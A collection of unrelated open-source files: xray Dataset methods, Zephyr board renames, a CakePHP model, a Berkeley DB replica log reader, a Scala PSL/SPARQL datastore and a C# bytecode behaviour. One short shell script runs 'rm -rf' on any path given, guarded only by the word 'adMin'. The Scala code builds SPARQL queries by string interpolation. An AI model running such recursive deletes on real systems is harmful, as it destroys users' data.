# unpack dimensions for the benefit of functions
# like np.argmin which can't handle tuple arguments
reduce_dims, = reduce_dims
elif len(reduce_dims) == var.ndim:
# prefer to aggregate over axis=None rather than
# axis=(0, 1) if they will be equivalent, because
# the former is often more efficient
reduce_dims = None
variables[name] = var.reduce(func, dim=reduce_dims,
keep_attrs=keep_attrs,
allow_lazy=allow_lazy,
**kwargs)
else:
variables[name] = var
coord_names = set(k for k in self.coords if k in variables)
attrs = self.attrs if keep_attrs else None
return self._replace_vars_and_dims(variables, coord_names, attrs)
def apply(self, func, keep_attrs=False, args=(), **kwargs):
"""Apply a function over the data variables in this dataset.
Parameters
----------
func : function
Function which can be called in the form `f(x, **kwargs)` to
transform each DataArray `x` in this dataset into another
DataArray.
keep_attrs : bool, optional
If True, the dataset's attributes (`attrs`) will be copied from
the original object to the new one. If False, the new object will
be returned without attributes.
args : tuple, optional
Positional arguments passed on to `func`.
**kwargs : dict
Keyword arguments passed on to `func`.
Returns
-------
applied : Dataset
Resulting dataset from applying ``func`` over each data variable.
"""
variables = OrderedDict(
(k, maybe_wrap_array(v, func(v, *args, **kwargs)))
for k, v in iteritems(self.data_vars))
attrs = self.attrs if keep_attrs else None
return type(self)(variables, attrs=attrs)
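    # Usage sketch:
    #
    #     ds.apply(np.fabs)                    # element-wise on each data variable
    #     ds.apply(lambda x: x * 10, keep_attrs=True)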
def assign(self, **kwargs):
"""Assign new data variables to a Dataset, returning a new object
with all the original variables in addition to the new ones.
Parameters
----------
kwargs : keyword, value pairs
keywords are the variables names. If the values are callable, they
are computed on the Dataset and assigned to new data variables. If
the values are not callable, (e.g. a DataArray, scalar, or array),
they are simply assigned.
Returns
-------
ds : Dataset
A new Dataset with the new variables in addition to all the
existing variables.
Notes
-----
Since ``kwargs`` is a dictionary, the order of your arguments may not
be preserved, and so the order of the new variables is not well
defined. Assigning multiple variables within the same ``assign`` is
possible, but you cannot reference other variables created within the
same ``assign`` call.
See Also
--------
pandas.DataFrame.assign
"""
data = self.copy()
# do all calculations first...
results = data._calc_assign_results(kwargs)
# ... and then assign
data.update(results)
return data
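    # Usage sketch (variable names are hypothetical; callables are evaluated
    # on the dataset itself):
    #
    #     ds.assign(temp_f=lambda d: d['temp_c'] * 9 / 5 + 32)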
def to_array(self, dim='variable', name=None):
"""Convert this dataset into an xray.DataArray
The data variables of this dataset will be broadcast against each other
and stacked along the first axis of the new array. All coordinates of
this dataset will remain coordinates.
Parameters
----------
dim : str, optional
Name of the new dimension.
name : str, optional
Name of the new data array.
Returns
-------
array : xray.DataArray
"""
from .dataarray import DataArray
data_vars = [self.variables[k] for k in self.data_vars]
broadcast_vars = broadcast_variables(*data_vars)
data = ops.stack([b.data for b in broadcast_vars], axis=0)
coords = dict(self.coords)
coords[dim] = list(self.data_vars)
dims = (dim,) + broadcast_vars[0].dims
return DataArray(data, coords, dims, attrs=self.attrs, name=name)
def _to_dataframe(self, ordered_dims):
columns = [k for k in self if k not in self.dims]
data = [self._variables[k].expand_dims(ordered_dims).values.reshape(-1)
for k in columns]
index = self.coords.to_index(ordered_dims)
return pd.DataFrame(OrderedDict(zip(columns, data)), index=index)
def to_dataframe(self):
"""Convert this dataset into a pandas.DataFrame.
Non-index variables in this dataset form the columns of the
        DataFrame. The DataFrame is indexed by the Cartesian product of
this dataset's indices.
"""
return self._to_dataframe(self.dims)
@classmethod
def from_dataframe(cls, dataframe):
"""Convert a pandas.DataFrame into an xray.Dataset
Each column will be converted into an independent variable in the
Dataset. If the dataframe's index is a MultiIndex, it will be expanded
into a tensor product of one-dimensional indices (filling in missing
values with NaN). This method will produce a Dataset very similar to
that on which the 'to_dataframe' method was called, except with
possibly redundant dimensions (since all dataset variables will have
the same dimensionality).
"""
# TODO: Add an option to remove dimensions along which the variables
# are constant, to enable consistent serialization to/from a dataframe,
# even if some variables have different dimensionality.
idx = dataframe.index
obj = cls()
if hasattr(idx, 'levels'):
# it's a multi-index
# expand the DataFrame to include the product of all levels
full_idx = pd.MultiIndex.from_product(idx.levels, names=idx.names)
dataframe = dataframe.reindex(full_idx)
dims = [name if name is not None else 'level_%i' % n
for n, name in enumerate(idx.names)]
for dim, lev in zip(dims, idx.levels):
obj[dim] = (dim, lev)
shape = [lev.size for lev in idx.levels]
else:
if idx.size:
dims = (idx.name if idx.name is not None else 'index',)
obj[dims[0]] = (dims, idx)
else:
dims = []
shape = -1
for name, series in iteritems(dataframe):
data = series.values.reshape(shape)
obj[name] = (dims, data)
return obj
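    # Round-trip sketch (frame contents are hypothetical):
    #
    #     df = pd.DataFrame({'v': [1, 2]}, index=pd.Index([10, 20], name='x'))
    #     Dataset.from_dataframe(df)  # 'x' becomes a dimension coordinate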
@staticmethod
def _unary_op(f):
@functools.wraps(f)
def func(self, *args, **kwargs):
ds = self.coords.to_dataset()
for k in self.data_vars:
ds._variables[k] = f(self._variables[k], *args, **kwargs)
return ds
return func
@staticmethod
def _binary_op(f, reflexive=False, join='inner', drop_na_vars=True):
@functools.wraps(f)
def func(self, other):
if isinstance(other, groupby.GroupBy):
return NotImplemented
if hasattr(other, 'indexes'):
self, other = align(self, other, join=join, copy=False)
empty_indexes = [d for d, s in self.dims.items() if s == 0]
if empty_indexes:
raise ValueError('no overlapping labels for some '
'dimensions: %s' % empty_indexes)
g = f if not reflexive else lambda x, y: f(y, x)
ds = self._calculate_binary_op(g, other, drop_na_vars=drop_na_vars)
return ds
return func
@staticmethod
def _inplace_binary_op(f):
@functools.wraps(f)
def func(self, other):
if isinstance(other, groupby.GroupBy):
raise TypeError('in-place operations between a Dataset and '
'a grouped object are not permitted')
if hasattr(other, 'indexes'):
other = other.reindex_like(self, copy=False)
# we don't want to actually modify arrays in-place
g = ops.inplace_to_noninplace_op(f)
ds = self._calculate_binary_op(g, other, inplace=True)
self._replace_vars_and_dims(ds._variables, ds._coord_names,
ds._attrs, inplace=True)
return self
return func
def _calculate_binary_op(self, f, other, inplace=False, drop_na_vars=True):
def apply_over_both(lhs_data_vars, rhs_data_vars, lhs_vars, rhs_vars):
dest_vars = OrderedDict()
performed_op = False
for k in lhs_data_vars:
if k in rhs_data_vars:
dest_vars[k] = f(lhs_vars[k], rhs_vars[k])
performed_op = True
elif inplace:
raise ValueError(
'datasets must have the same data variables '
'for in-place arithmetic operations: %s, %s'
% (list(lhs_data_vars), list(rhs_data_vars)))
elif not drop_na_vars:
# this shortcuts left alignment of variables for fillna
dest_vars[k] = lhs_vars[k]
if not performed_op:
raise ValueError(
'datasets have no overlapping data variables: %s, %s'
% (list(lhs_data_vars), list(rhs_data_vars)))
return dest_vars
if utils.is_dict_like(other) and not isinstance(other, Dataset):
# can't use our shortcut of doing the binary operation with
# Variable objects, so apply over our data vars instead.
new_data_vars = apply_over_both(self.data_vars, other,
self.data_vars, other)
return Dataset(new_data_vars)
other_coords = getattr(other, 'coords', None)
ds = self.coords.merge(other_coords)
if isinstance(other, Dataset):
new_vars = apply_over_both(self.data_vars, other.data_vars,
self.variables, other.variables)
else:
other_variable = getattr(other, 'variable', other)
new_vars = OrderedDict((k, f(self.variables[k], other_variable))
for k in self.data_vars)
ds._variables.update(new_vars)
return ds
ops.inject_all_ops_and_reduce_methods(Dataset, array_only=False)
| kjordahl/xray | xray/core/dataset.py | Python | apache-2.0 | 72,806 |
# SPDX-License-Identifier: Apache-2.0
# This file contains boards in Zephyr which has been replaced with a new board
# name.
# This allows the system to automatically change the board while at the same
# time prints a warning to the user, that the board name is deprecated.
#
# To add a board rename, add a line in following format:
# set(<old_board_name>_DEPRECATED <new_board_name>)
set(bl5340_dvk_cpuappns_DEPRECATED bl5340_dvk_cpuapp_ns)
set(mps2_an521_nonsecure_DEPRECATED mps2_an521_ns)
set(musca_b1_nonsecure_DEPRECATED musca_b1_ns)
set(musca_s1_nonsecure_DEPRECATED musca_s1_ns)
set(nrf5340dk_nrf5340_cpuappns_DEPRECATED nrf5340dk_nrf5340_cpuapp_ns)
set(nrf9160dk_nrf9160ns_DEPRECATED nrf9160dk_nrf9160_ns)
set(circuitdojo_feather_nrf9160ns_DEPRECATED circuitdojo_feather_nrf9160_ns)
set(nrf9160_innblue21ns_DEPRECATED nrf9160_innblue21_ns)
set(nrf9160_innblue22ns_DEPRECATED nrf9160_innblue22_ns)
set(sparkfun_thing_plus_nrf9160ns_DEPRECATED sparkfun_thing_plus_nrf9160_ns)
set(thingy53_nrf5340_cpuappns_DEPRECATED thingy53_nrf5340_cpuapp_ns)
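# Illustrative consumption (assumed, simplified): board-selection logic can
# test if(DEFINED ${BOARD}_DEPRECATED) and, when it is set, print a warning
# and reassign set(BOARD ${${BOARD}_DEPRECATED}) so old names keep building.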
| galak/zephyr | boards/deprecated.cmake | CMake | apache-2.0 | 1,054 |
<?php
App::uses('AppModel', 'Model');
/**
* ProdCodeDivn Model
*
* @property ProdCodeSection $ProdCodeSection
* @property ProdCodeGroup $ProdCodeGroup
*/
class ProdCodeDivn extends AppModel {
/**
* Display field
*
* @var string
*/
public $displayField = 'divn_desc_eng';
/**
* Validation rules
*
* @var array
*/
public $validate = array(
'prod_code_section_id' => array(
'notempty' => array(
'rule' => array('notempty'),
//'message' => 'Your custom message here',
//'allowEmpty' => false,
//'required' => false,
//'last' => false, // Stop validation after this rule
//'on' => 'create', // Limit validation to 'create' or 'update' operations
),
),
'divn_code' => array(
'numeric' => array(
'rule' => array('numeric'),
//'message' => 'Your custom message here',
//'allowEmpty' => false,
//'required' => false,
//'last' => false, // Stop validation after this rule
//'on' => 'create', // Limit validation to 'create' or 'update' operations
),
),
);
//The Associations below have been created with all possible keys, those that are not needed can be removed
/**
* belongsTo associations
*
* @var array
*/
public $belongsTo = array(
'ProdCodeSection' => array(
'className' => 'ProdCodeSection',
'foreignKey' => 'prod_code_section_id',
'conditions' => '',
'fields' => '',
'order' => ''
)
);
/**
* hasMany associations
*
* @var array
*/
/*
public $hasMany = array(
'ProdCodeGroup' => array(
'className' => 'ProdCodeGroup',
'foreignKey' => 'prod_code_divn_id',
'dependent' => false,
'conditions' => '',
'fields' => '',
'order' => '',
'limit' => '',
'offset' => '',
'exclusive' => '',
'finderQuery' => '',
'counterQuery' => ''
)
);*/
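/**
 * Illustrative usage from a controller (an assumed call site, not part of
 * the baked model):
 *
 *   $divisions = $this->ProdCodeDivn->find('all', array(
 *       'conditions' => array('ProdCodeDivn.prod_code_section_id' => $sectionId),
 *   ));
 */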
}
| hasanmbstu13/Project | Cakephp/ec2014/app/Model/ProdCodeDivn.php | PHP | apache-2.0 | 1,803 |
/*-
* See the file LICENSE for redistribution information.
*
* Copyright (c) 2002-2010 Oracle. All rights reserved.
*
* $Id: ReplicaSyncupReader.java,v 1.4 2010/01/11 20:00:48 linda Exp $
*/
package com.sleepycat.je.rep.stream;
import static com.sleepycat.je.utilint.DbLsn.NULL_LSN;
import java.io.IOException;
import java.nio.ByteBuffer;
import java.util.logging.Level;
import java.util.logging.Logger;
import com.sleepycat.je.DatabaseException;
import com.sleepycat.je.EnvironmentFailureException;
import com.sleepycat.je.dbi.EnvironmentImpl;
import com.sleepycat.je.log.LogEntryType;
import com.sleepycat.je.log.entry.LogEntry;
import com.sleepycat.je.recovery.CheckpointEnd;
import com.sleepycat.je.rep.impl.node.NameIdPair;
import com.sleepycat.je.rep.vlsn.VLSNIndex;
import com.sleepycat.je.rep.vlsn.VLSNRange;
import com.sleepycat.je.txn.TxnCommit;
import com.sleepycat.je.utilint.LoggerUtils;
import com.sleepycat.je.utilint.VLSN;
/**
* The ReplicaSyncupReader scans the log backwards for requested log entries.
* The reader must track whether it has passed a checkpoint, and therefore
 * cannot use the vlsn index to skip over entries.
*
* The ReplicaSyncupReader is not thread safe, and can only be used
* serially. It will stop at the finishLsn, which should be set using the
* GlobalCBVLSN.
*/
public class ReplicaSyncupReader extends VLSNReader {
/* True if this particular record retrieval is for a syncable record. */
private boolean syncableSearch;
private final LogEntry ckptEndLogEntry =
LogEntryType.LOG_CKPT_END.getNewLogEntry();
private final LogEntry commitLogEntry =
LogEntryType.LOG_TXN_COMMIT.getNewLogEntry();
/*
* SearchResults retains the information as to whether the found
* matchpoint is valid.
*/
private final MatchpointSearchResults searchResults;
private final Logger logger;
public ReplicaSyncupReader(EnvironmentImpl envImpl,
VLSNIndex vlsnIndex,
long endOfLogLsn,
int readBufferSize,
NameIdPair nameIdPair,
VLSN startVLSN,
long finishLsn,
MatchpointSearchResults searchResults)
throws IOException, DatabaseException {
/*
* If we go backwards, endOfFileLsn and startLsn must not be null.
* Make them the same, so we always start at the same very end.
*/
super(envImpl,
vlsnIndex,
false, // forward
endOfLogLsn,
readBufferSize,
nameIdPair,
finishLsn);
initScan(startVLSN, endOfLogLsn);
this.searchResults = searchResults;
logger = LoggerUtils.getLogger(getClass());
}
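    /*
     * Illustrative driver loop (an assumed call site, not part of this class;
     * matches() is hypothetical):
     *
     *   OutputWireRecord record = reader.scanBackwards(candidateVLSN);
     *   while (record != null && !matches(record)) {
     *       record = reader.findPrevSyncEntry();
     *   }
     */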
/**
* Set up the ReplicaSyncupReader to start scanning from this VLSN.
* @throws IOException
*/
private void initScan(VLSN startVLSN, long endOfLogLsn)
throws IOException {
if (startVLSN.equals(VLSN.NULL_VLSN)) {
throw EnvironmentFailureException.unexpectedState
("ReplicaSyncupReader start can't be NULL_VLSN");
}
startLsn = endOfLogLsn;
assert startLsn != NULL_LSN;
/*
* Flush the log so that syncup can assume that all log entries that
* are represented in the VLSNIndex are safely out of the log buffers
* and on disk. Simplifies this reader, so it can use the regular
* ReadWindow, which only works on a file.
*/
envImpl.getLogManager().flush();
window.initAtFileStart(startLsn);
currentEntryPrevOffset = window.getEndOffset();
currentEntryOffset = window.getEndOffset();
currentVLSN = startVLSN;
}
/**
* Backward scanning for the replica's part in syncup.
*/
public OutputWireRecord scanBackwards(VLSN vlsn)
throws DatabaseException {
syncableSearch = false;
VLSNRange range = vlsnIndex.getRange();
if (vlsn.compareTo(range.getFirst()) < 0) {
/*
* The requested VLSN is before the start of our range, we don't
* have this record.
*/
return null;
}
currentVLSN = vlsn;
if (readNextEntry()) {
return currentFeedRecord;
}
return null;
}
/**
* Backward scanning for finding an earlier candidate syncup matchpoint.
*/
public OutputWireRecord findPrevSyncEntry()
throws DatabaseException {
currentFeedRecord = null;
syncableSearch = true;
/* Start by looking at the entry before the current record. */
currentVLSN = currentVLSN.getPrev();
VLSNRange range = vlsnIndex.getRange();
if (currentVLSN.compareTo(range.getFirst()) < 0) {
/*
* We've walked off the end of the contiguous VLSN range.
*/
return null;
}
if (readNextEntry() == false) {
/*
* We scanned all the way to the front of the log, no
* other sync-able entry found.
*/
return null;
}
assert LogEntryType.isSyncPoint(currentFeedRecord.getEntryType()) :
"Unexpected log type= " + currentFeedRecord;
return currentFeedRecord;
}
/**
     * @throws EnvironmentFailureException if we were scanning for a
     * particular VLSN and have passed it by.
*/
private void checkForPassingTarget(int compareResult) {
if (compareResult < 0) {
/* Hey, we passed the VLSN we wanted. */
throw EnvironmentFailureException.unexpectedState
("want to read " + currentVLSN + " but reader at " +
currentEntryHeader.getVLSN());
}
}
/**
* Return true for ckpt entries, for syncable entries, and if we're in
* specific vlsn scan mode, any replicated entry. There is an additional
* level of filtering in processEntry.
*/
@Override
protected boolean isTargetEntry()
throws DatabaseException {
if (logger.isLoggable(Level.FINEST)) {
LoggerUtils.finest(logger, envImpl,
" isTargetEntry " + currentEntryHeader);
}
nScanned++;
/* Skip invisible entries. */
if (currentEntryHeader.isInvisible()) {
return false;
}
byte currentType = currentEntryHeader.getType();
/*
* Return true if this entry is replicated. All entries need to be
         * perused by processEntry when we are doing a vlsn-based search,
* even if they are not a sync point, because:
* (a) If this is a vlsn-based search, it's possible that the replica
* and feeder are mismatched. The feeder will only propose a sync type
* entry as a matchpoint but it might be that the replica has a non-
* sync entry at that vlsn.
* (b) We need to note passed commits in processEntry.
*/
if (entryIsReplicated()) {
if (syncableSearch) {
if (LogEntryType.isSyncPoint(currentType)) {
return true;
}
currentVLSN = currentEntryHeader.getVLSN().getPrev();
} else {
return true;
}
}
/*
* We'll also need to read checkpoint end records to record their
* presence.
*/
if (LogEntryType.LOG_CKPT_END.equalsType(currentType)) {
return true;
}
return false;
}
/**
* ProcessEntry does additional filtering before deciding whether to
* return an entry as a candidate for matching.
*
* If this is a record we are submitting as a matchpoint candidate,
* instantiate a WireRecord to house this log entry. If this is a
* non-replicated entry or a txn end that follows the candidate matchpoint,
* record whatever status we need to, but don't use it for comparisons.
*
     * For example, suppose the log is like this:
*
* VLSN entry
* 10 LN
* 11 commit
* 12 LN
* -- ckpt end
* 13 commit
* 14 abort
*
* And that the master only has VLSNs 1-12. The replica will suggest vlsn
* 14 as the first matchpoint. The feeder will counter with a suggestion
     * of vlsn 11, since it does not have vlsn 14.
*
* At that point, the ReplicaSyncupReader will scan backwards in the log,
* looking for vlsn 11. Although the reader should only return an entry
     * when it gets to vlsn 11, the reader must process commits and ckpts that
     * follow 11 so that they can be recorded in the searchResults and the
     * number of rolled-back commits can be accurately reported.
*/
@Override
protected boolean processEntry(ByteBuffer entryBuffer) {
if (logger.isLoggable(Level.FINEST)) {
LoggerUtils.finest(logger, envImpl,
" syncup reader saw " + currentEntryHeader);
}
byte currentType = currentEntryHeader.getType();
/*
* CheckpointEnd entries are tracked in order to see if a rollback
* must be done, but are not returned as possible matchpoints.
*/
if (LogEntryType.LOG_CKPT_END.equalsType(currentType)) {
/*
* Read the entry, which both lets us decipher its contents and
* also advances the file reader position.
*/
ckptEndLogEntry.readEntry(currentEntryHeader, entryBuffer,
true /*readFullItem*/);
if (logger.isLoggable(Level.FINEST)) {
LoggerUtils.finest(logger, envImpl,
" syncup reader read " +
currentEntryHeader + ckptEndLogEntry);
}
if (((CheckpointEnd) ckptEndLogEntry.getMainItem()).
getCleanedFilesToDelete()) {
searchResults.notePassedCheckpointEnd();
}
return false;
}
/*
* Setup the log entry as a wire record so we can compare it to
* the entry from the feeder as we look for a matchpoint. Do this
* before we change positions on the entry buffer by reading it.
*/
ByteBuffer buffer = entryBuffer.slice();
buffer.limit(currentEntryHeader.getItemSize());
currentFeedRecord = new OutputWireRecord(currentEntryHeader, buffer);
/*
* All commit records must be tracked to figure out if we've exceeded
* the txn rollback limit. For reporting reasons, we'll need to
* unmarshal the log entry, so we can read the timestamp in the commit
* record.
*/
if (LogEntryType.LOG_TXN_COMMIT.equalsType(currentType)) {
commitLogEntry.readEntry(currentEntryHeader, entryBuffer,
true /*readFullItem*/);
TxnCommit commit = (TxnCommit) commitLogEntry.getMainItem();
searchResults.notePassedCommits(commit.getTime(),
commit.getId(),
currentEntryHeader.getVLSN(),
getLastLsn());
if (logger.isLoggable(Level.FINEST)) {
LoggerUtils.finest(logger, envImpl,
"syncup reader read " +
currentEntryHeader + commitLogEntry);
}
} else {
entryBuffer.position(entryBuffer.position() +
currentEntryHeader.getItemSize());
}
if (syncableSearch) {
return true;
}
/* We're looking for a particular VLSN. */
int compareResult = currentEntryHeader.getVLSN().compareTo(currentVLSN);
checkForPassingTarget(compareResult);
/* return true if this is the entry we want. */
return (compareResult == 0);
}
}
| bjorndm/prebake | code/third_party/bdb/src/com/sleepycat/je/rep/stream/ReplicaSyncupReader.java | Java | apache-2.0 | 12,355 |
package so.modernized.whip
import java.util.{Set => JSet}
import java.net.{URI => JURI}
import com.cambridgesemantics.anzo.unstructured.graphsummarization.PatternSolutionExtras
import com.cambridgesemantics.anzo.unstructured.graphsummarization.XMLUnapplicable._
import so.modernized.psl_scala.primitives.PSLUnapplicable._
import so.modernized.psl_scala.primitives.{PSLUnapplicable, PSLVar}
import so.modernized.whip.URIUniqueId._
import so.modernized.whip.sparql.QueryIterator
import so.modernized.whip.util._
import scala.util.{Failure, Success, Try}
import scala.collection.JavaConverters._
import scala.collection.mutable
import com.cambridgesemantics.anzo.utilityservices.common.EncodingUtils
import edu.umd.cs.psl.database.loading.{Updater, Inserter}
import edu.umd.cs.psl.database._
import edu.umd.cs.psl.model.argument._
import edu.umd.cs.psl.model.atom._
import edu.umd.cs.psl.model.predicate.{SpecialPredicate, FunctionalPredicate, Predicate, StandardPredicate}
import org.openanzo.client.IAnzoClient
import org.openanzo.rdf.{URI => AnzoURI, Statement, Value}
class TypedStandardPredicate[A, B](name:String, val uriType:AnzoURI, val domain:AnzoURI, val range:AnzoURI)(implicit aEv:PSLUnapplicable[A], bEv:PSLUnapplicable[B]) extends StandardPredicate(name, Array(aEv.argType, bEv.argType))
/**
* A Variable that is typed by the rdf:class of the arguments that it can take (determined by @uriType)
*/
case class TypedVariable(name:String, uriType:AnzoURI) extends Variable(name) {
override def toString = name
}
object TypedVariable {
def tv(name:String, uri:AnzoURI) = new TypedVariable(name, uri)
}
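// Illustrative usage (assumed URI, not part of the original file):
//   val person = TypedVariable.tv("person", EncodingUtils.uri("http://example.org/Person"))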
object PSLURIVar {
def unapply(t:Term) = t match {
case v:TypedVariable => Some(v)
case _ => None
}
}
/*
class LazyResultList(iter:QueryIterator, varPos:Map[Variable, Int], val size:Int) extends ResultList {
private val resStream = iter.flatten.toStream
def get(resultNo: Int, `var`: Variable) = get(resultNo)(varPos(`var`))
def get(resultNo: Int): Array[GroundTerm] = resStream(resultNo)
val getArity = 2
}
*/
class SparqlResultList(varPos:Map[Variable, Int]) extends mutable.ArrayBuffer[Array[GroundTerm]] with ResultList {
override def +=(elem: Array[GroundTerm]) = {
assert(elem.length == 2)
super.+=(elem)
}
override def get(resultNo: Int, `var`: Variable): GroundTerm = this(resultNo)(varPos(`var`))
override def get(resultNo: Int): Array[GroundTerm] = this(resultNo)
val getArity = 2
}
class PSLSparqlDataStore(protected[whip] val anzo:IAnzoClient, keyFields:Set[AnzoURI]) extends DataStore {
protected[whip] val observedPredicates = mutable.HashSet[StandardPredicate]() //mutable.HashMap[AnzoURI, StandardPredicate]()
protected[whip] val targetPredicates = mutable.HashSet[StandardPredicate]()
protected[whip] val variables = mutable.HashMap[String, TypedVariable]()
override def registerPredicate(predicate: StandardPredicate): Unit = {
predicate match {
case tp:TypedStandardPredicate[_,_] =>
if(keyFields contains tp.uriType) {
observedPredicates += tp
} else {
targetPredicates += tp
}
case s:StandardPredicate =>
require(predicate.getArity == 2)
Try(EncodingUtils.uri(predicate.getName)) match {
case Success(uri) if keyFields contains uri => observedPredicates += predicate
case Success(uri) => targetPredicates += predicate
case Failure(f) => throw new IllegalArgumentException("Expected a uri for predicate name, got " + predicate.getName)
}
}
}
def registerTypedVariable(v:TypedVariable): Unit = { variables += v.name -> v }
override def getRegisteredPredicates: JSet[StandardPredicate] = (observedPredicates ++ targetPredicates).asJava
override def getUniqueID(key: Any): UniqueID = key match {
case uri:AnzoURI => new URIUniqueId(uri)
case jUri:JURI => new URIUniqueId(EncodingUtils.uri(jUri.toString))
case str:String if Try(EncodingUtils.uri(str)).isSuccess => new URIUniqueId(EncodingUtils.uri(str))
case otw => throw new IllegalArgumentException("Expected a uri or uri string, received " + otw.toString)
}
def getDatabase(datasets:Set[AnzoURI], ontology:AnzoURI=null) = new PSLSparqlDatabase(this, datasets, ontology, variables.toMap)
override def getUpdater(predicate: StandardPredicate, partition: Partition): Updater = ???
override def getInserter(predicate: StandardPredicate, partition: Partition): Inserter = ???
override def deletePartition(partition: Partition): Int = ???
override def getDatabase(write: Partition, read: Partition*): Database = ???
override def getDatabase(write: Partition, toClose: JSet[StandardPredicate], read: Partition*): Database = ???
override def close() {/*noOp*/}
override def getNextPartition: Partition = ???
}
class PSLSparqlDatabase(private val datastore:PSLSparqlDataStore, private val datasets:Set[AnzoURI], private val ontology:AnzoURI, variableMap:Map[String,TypedVariable]) extends Database {
private val anzo = datastore.anzo
private val cache = new AtomCache(this)
private val observed = datastore.observedPredicates
private val target = datastore.targetPredicates
def getAtom(p:Predicate, arguments:GroundTerm*) =
Option(cache.getCachedAtom(new QueryAtom(p, arguments:_*))) match {
case Some(res) => res
case None => p match {
case tp:TypedStandardPredicate[_,_] => // TODO should this work for non-typed predicates? nothing else will
val Seq(PSLURI(s), PSLURI(o)) = arguments // TODO expand for other options
val value = if(anzo.serverQuery(null, null, datasets.asJava, s"ASK { <$s> <${tp.uriType}> <$o> }").getAskResults) 1.0 else 0.0
if(observed contains tp) {
println("generating obs atom for " + (tp, arguments, value))
cache.instantiateObservedAtom(tp, arguments.toArray, value, Double.NaN)
} else if(target contains tp) {
if(value > 0.0)
println("generating rv atom for " + (tp, arguments, value))
cache.instantiateRandomVariableAtom(tp, arguments.toArray, value, Double.NaN)
} else {
throw new IllegalArgumentException("Expected predicate to be registered as observed or target, but wasn't either")
}
case sp:SparqlPredicate =>
if(!sp.isComputed) sp.precompute(this)
cache.instantiateObservedAtom(sp, arguments.toArray, sp.computeValue(new ReadOnlyDatabase(this), arguments:_*), Double.NaN)
}
}
override def getRegisteredPredicates = datastore.getRegisteredPredicates
override def getUniqueID(key: Any) = datastore.getUniqueID(key)
override def getDataStore = datastore
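  // NOTE: query template retained as written; executeQuery below currently
  // assembles the SELECT string inline rather than filling in this pattern.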
private val executeQ =
"""SELECT %s
|WHERE {
| %s
|}""".stripMargin
def executeQuery(query:DatabaseQuery) = {
val f = query.getFormula
val atoms = f.getAtoms(mutable.Set.empty[Atom].asJava).asScala
val projected = (query.getProjectionSubset.asScala.toSet ++
f.collectVariables(new VariableTypeMap).asScala.keySet) --
query.getPartialGrounding.asScala.keySet
val projectedBindings = mutable.ArrayBuffer[Variable]()
val whereClauses = atoms.map { a =>
(a.getPredicate, a.getArguments) match {
case (p:TypedStandardPredicate[_, _], Array(PSLVar(s), PSLVar(o))) if observed contains p =>
projectedBindings += s
projectedBindings += o
s"\t?$s <${p.uriType}> ?$o ."
case (p:TypedStandardPredicate[_, _], Array(PSLVar(s), PSLVar(o))) if target contains p =>
val (sType, oType) = (s, o) match {
case (PSLURIVar(su), PSLURIVar(ou)) => su.uriType -> ou.uriType
case _ => p.domain -> p.range
}
projectedBindings += s
projectedBindings += o
Seq(s"\t?$s a <$sType> .",
s"\t?$o a <$oType> .").mkString("\n")
case (sp:SparqlPredicate, Array(PSLVar(s), PSLVar(o))) =>
if(!sp.isComputed) {
sp.precompute(this)
}
s"?$s <${sp.predicate}> ?$o ."
case (p:StandardPredicate, ts) =>
println ("observed " + observed + "\ntarget " + target)
throw new IllegalArgumentException("Wasn't expecting " + (p, p.getClass, observed contains p, target contains p, ts.toSeq))
}
}.mkString("\n")
val Q = s"SELECT ${projectedBindings.map(v => "?" + v.getName).toSet.mkString(" ")}\nWHERE {\n$whereClauses\n}"
println(f)
println(projected)
println(Q)
val res = new SparqlResultList(projectedBindings.zipWithIndex.toMap)
val q = anzo.serverQuery(null, null, datasets.asJava, Q).getSelectResults.asScala.foreach { ps =>
val m = ps.toMap
res += projectedBindings.map(v => xml2Psl(m(v.getName))).toArray
}
res
}
override def close() {/*noOp*/}
override def isClosed(predicate: StandardPredicate) = target contains predicate
override def getAtomCache = cache
override def commit(atom: RandomVariableAtom): Unit = {
require(atom.getArity == 2)
val p = EncodingUtils.uri(atom.getPredicate.getName)
atom.getArguments match {
case Array(PSLURI(s), PSLURI(o)) =>
val stmt = new Statement(s, p, o)
val stmtVal = new Statement(s, EncodingUtils.uri(p.toString +"_value"), xmlWrap(atom.getValue))
val stmtConf = new Statement(s, EncodingUtils.uri(p.toString +"_confidence"), xmlWrap(atom.getConfidenceValue))
anzo.add(stmt, stmtVal, stmtConf)
anzo.commit()
anzo.updateRepository(true)
case otw => ???
}
}
}
| JackSullivan/whip | src/main/scala/so/modernized/whip/PSLSparqlDatabase.scala | Scala | apache-2.0 | 9,595 |
using De.Osthus.Ambeth.Bytecode.Visitor;
using De.Osthus.Ambeth.Ioc.Annotation;
using De.Osthus.Ambeth.Log;
using De.Osthus.Ambeth.Merge;
using De.Osthus.Ambeth.Merge.Model;
using De.Osthus.Ambeth.Proxy;
using System;
using System.Collections.Generic;
namespace De.Osthus.Ambeth.Bytecode.Behavior
{
public class EnhancedTypeBehavior : AbstractBehavior
{
[LogInstance]
public ILogger Log { private get; set; }
[Autowired]
public IEntityMetaDataProvider EntityMetaDataProvider { protected get; set; }
public override Type[] GetEnhancements()
{
return new Type[] { typeof(IEnhancedType), typeof(IEntityMetaDataHolder) };
}
public override IClassVisitor Extend(IClassVisitor visitor, IBytecodeBehaviorState state, IList<IBytecodeBehavior> remainingPendingBehaviors,
IList<IBytecodeBehavior> cascadePendingBehaviors)
{
if ((state.GetContext<EntityEnhancementHint>() == null && state.GetContext<EmbeddedEnhancementHint>() == null))
{
return visitor;
}
if (state.GetContext<EntityEnhancementHint>() != null)
{
IEntityMetaData metaData = EntityMetaDataProvider.GetMetaData(state.OriginalType);
visitor = new InterfaceAdder(visitor, typeof(IEntityMetaDataHolder));
visitor = new EntityMetaDataHolderVisitor(visitor, metaData);
}
visitor = new InterfaceAdder(visitor, typeof(IEnhancedType));
visitor = new GetBaseTypeMethodCreator(visitor);
return visitor;
}
}
} | Dennis-Koch/ambeth | ambeth/Ambeth.Cache.Bytecode/ambeth/bytecode/behavior/EnhancedTypeBehavior.cs | C# | apache-2.0 | 1,613 |
#!/bin/bash
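# Deletes the path given as $1, but only when the second argument is the
# literal guard word "adMin" -- a small latch against accidental removal.
# Usage: vcmdr.sh <path> adMin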
if [[ $# -eq 2 ]] && [[ "x$2" = "xadMin" ]] ; then
   /bin/rm -rf "$1"
fi
| OpenVnmrJ/OpenVnmrJ | src/scripts/vcmdr.sh | Shell | apache-2.0 | 86 |
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
